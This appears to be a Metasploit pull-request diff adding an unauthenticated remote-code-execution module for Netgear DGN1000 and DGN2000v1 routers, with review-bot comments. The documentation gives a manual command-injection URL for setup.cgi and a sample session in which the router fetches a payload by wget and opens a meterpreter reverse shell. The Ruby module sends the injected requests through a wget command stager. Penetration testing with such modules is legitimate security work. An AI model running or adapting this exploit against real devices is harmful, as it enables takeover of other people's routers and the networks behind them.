Land #9106 netgear dgn1000 unauth rce module
Showing 2 changed files with 145 additions and 0 deletions.
documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md (51 additions & 0 deletions)
@@ -0,0 +1,51 @@ | ||
The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/¤tsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload. | ||
|
||
## Vulnerable Application | ||
|
||
Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
2. Do : `use exploit/linux/http/netgear_dgn1000_setup_unauth_exec` | ||
3. Do : `set RHOST [RouterIP]` | ||
4. Do : `set PAYLOAD [payload]` | ||
5. Do : `run` | ||
6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session | ||
|
||
## Scenarious | ||
|
||
Sample output of a successfull exploitation should be look like this : | ||
|
||
``` | ||
msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec | ||
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1 | ||
RHOST => 192.168.0.1 | ||
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80 | ||
RPORT => 80 | ||
msf exploit(netgear_dgn1000_setup_unauth_exec) > set LHOST eth0 | ||
LHOST = eth0 | ||
msf exploit(netgear_dgn1000_setup_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp | ||
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp | ||
msf exploit(netgear_dgn1000_setup_unauth_exec) > run | ||
[*] Started reverse TCP handler on 192.168.0.11:4444 | ||
[*] 192.168.0.1:80 - Connecting to target... | ||
[*] 192.168.0.1:80 - Exploiting target .... | ||
[*] Using URL: http://0.0.0.0:8080/DnuJhOHYg7auIz | ||
[*] Local IP: http://192.168.0.11:8080/DnuJhOHYg7auIz | ||
[*] Client 192.168.0.1 (Wget) requested /DnuJhOHYg7auIz | ||
[*] Sending payload to 192.168.0.1 (Wget) | ||
[*] Sending stage (1073332 bytes) to 192.168.0.1 | ||
[*] Meterpreter session 2 opened (192.168.0.11:4444 -> 192.168.0.1:51558) at 2017-10-20 20:37:06 -0400 | ||
[*] Command Stager progress - 100.00% done (129/129 bytes) | ||
[*] Server stopped. | ||
meterpreter > sysinfo | ||
Computer : 192.168.0.1 | ||
OS : (Linux 2.6.20-Amazon_SE) | ||
Architecture : mips | ||
Meterpreter : mipsbe/linux | ||
meterpreter > | ||
``` | ||
|
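Review bot: the Verification Steps omit `set LHOST`, which the default `linux/mipsbe/meterpreter/reverse_tcp` payload needs and which the sample session does set; add a step between `set RHOST [RouterIP]` and `set PAYLOAD [payload]`. The manual example URL in the first paragraph has lost its `currentsetting.htm` parameter (`&curren` rendered as `¤`); it should read `&currentsetting.htm=1` to match the `vars_get` the module sends. Spelling and grammar to fix: "occurs in within", "fuction", "Scenarious", "successfull", "should be look like this", "obtain an session"; and `LHOST = eth0` in the sample output should be `LHOST => eth0`, consistent with the other `=>` lines in the same session.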
modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb (94 additions & 0 deletions)
@@ -0,0 +1,94 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::CmdStager | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE', | ||
'Description' => %q{ | ||
This module exploits an unauthenticated OS command execution vulneralbility | ||
in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and | ||
DGN2000v1 models. | ||
}, | ||
'Author' => [ | ||
'Mumbai <https://github.com/realoriginal>', # module | ||
'Robort Palerie <roberto@greyhats.it>' # vuln discovery | ||
], | ||
'References' => [ | ||
['EDB', '25978'], | ||
], | ||
'DisclosureDate' => 'Jun 5 2013', | ||
'License' => MSF_LICENSE, | ||
'Platform' => 'linux', | ||
'Arch' => ARCH_MIPSBE, | ||
'DefaultTarget' => 0, | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp' | ||
}, | ||
'Privileged' => true, | ||
'Payload' => { | ||
'DisableNops' => true, | ||
}, | ||
'Targets' => [[ 'Automatic', {} ]], | ||
)) | ||
end | ||
|
||
def check | ||
begin | ||
res = send_request_cgi({ | ||
'uri' => '/setup.cgi', | ||
'method' => 'GET' | ||
}) | ||
if res && res.headers['WWW-Authenticate'] | ||
auth = res.headers['WWW-Authenticate'] | ||
if auth =~ /DGN1000/ | ||
return Exploit::CheckCode::Detected | ||
end | ||
end | ||
rescue ::Rex::ConnectionError | ||
return Exploit::CheckCode::Unknown | ||
end | ||
Exploit::CheckCode::Unknown | ||
end | ||
|
||
def exploit | ||
print_status("#{peer} - Connecting to target...") | ||
|
||
unless check == Exploit::CheckCode::Detected | ||
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL") | ||
end | ||
|
||
print_status("#{peer} - Exploiting target ....") | ||
execute_cmdstager( | ||
:flavor => :wget, | ||
:linemax => 200, | ||
:concat_operator => " && " | ||
) | ||
end | ||
|
||
def execute_command(cmd, opts) | ||
begin | ||
res = send_request_cgi({ | ||
'uri' => '/setup.cgi', | ||
'method' => 'GET', | ||
'vars_get' => { | ||
'next_file' => 'netgear.cfg', | ||
'todo' => 'syscmd', | ||
'cmd' => cmd.to_s, | ||
'curpath' => '/', | ||
'currentsetting.htm' => '1' | ||
} | ||
}) | ||
return res | ||
rescue ::Rex::ConnectionError | ||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") | ||
end | ||
end | ||
end |
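Review bot: `check` only returns `Detected` when the `WWW-Authenticate` header matches `/DGN1000/`, and `exploit` refuses to run unless `check == Exploit::CheckCode::Detected`, so the DGN2000v1 models named in the description and in the documentation can never be targeted by this module; either widen the match to whatever realm those devices send (e.g. `/DGN(1000|2000)/`, to be verified) or drop the hard gate in `exploit` and document which models `check` recognizes. When the header is present but does not match, returning `Exploit::CheckCode::Safe` instead of falling through to `Unknown` would make the result more useful, and `Failure::Unknown` in `exploit` is better expressed as `Failure::NotVulnerable` or `Failure::NoTarget`. Spelling: "vulneralbility" in the description, and the discoverer's name "Robort Palerie" does not match the `roberto@` address beside it; verify it against the EDB 25978 entry.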